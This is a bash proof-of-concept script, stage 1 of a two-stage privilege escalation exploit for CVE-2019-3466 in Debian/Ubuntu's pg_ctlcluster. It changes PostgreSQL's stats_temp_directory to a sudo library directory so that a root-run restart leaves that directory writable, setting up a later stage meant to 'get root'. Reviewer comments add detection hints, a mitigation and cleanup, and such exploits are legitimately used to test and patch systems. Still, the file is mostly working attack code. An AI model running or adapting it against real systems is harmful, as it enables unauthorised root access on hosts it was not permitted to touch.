#!/bin/bash
# PoC for CVE-2019-3466
# Author: Rich Mirch @0xm1rch
# Blog: https://blog.mirch.io/cve-2019-3466-debian-ubuntu-pg_ctlcluster-privilege-escalation
#
# Usage
# ./CVE-2019-3466-stage1.sh
# Restart postgresql via systemd
# ./CVE-2019-3466-stage2.sh
#
# Stage 1 of the PoC: runs as the database user and only changes one
# PostgreSQL setting; nothing in this file executes as root.
#
# Reviewer notes (defensive):
#  - ALTER SYSTEM persists the value in postgresql.auto.conf and normally
#    needs a database superuser, so a stats_temp_directory that points outside
#    PostgreSQL's own directories is a strong indicator worth alerting on.
#  - NOTE(review): the restart step below implies the privileged cluster
#    start-up acts on this path; that mechanism is not shown in this file -
#    confirm against the CVE-2019-3466 advisory.
#  - Mitigation: install the postgresql-common update that fixes
#    CVE-2019-3466 and keep database superuser access tightly limited.
target=/usr/lib/sudo/haswell/libaudit.so.1
target_dir=$(dirname "${target}")

# Guard: if the directory is already writable by the current user there is
# nothing for this stage to change, so stop with a non-zero status.
if [[ -w ${target_dir?} ]]; then
  echo "ERROR: ${target_dir?} is already writable - run stage2 to get root"
  exit 1
fi

# Same psql flags for both calls: bare value output, no headers or alignment.
psql_opts=(--tuples-only --no-align --quiet)
configured_dir=$(psql "${psql_opts[@]}" -c 'show stats_temp_directory')

# Only issue ALTER SYSTEM when the setting does not already match.
[[ ${configured_dir?} == ${target_dir?} ]] ||
  psql "${psql_opts[@]}" -c "alter system set stats_temp_directory TO '$target_dir'"

echo "Postgres must now be restarted via systemct/service as root; Then execute CVE-2019-3466-stage2.sh"

# Cleanup after testing: run "alter system reset stats_temp_directory;" so the
# modified setting does not persist in the cluster configuration.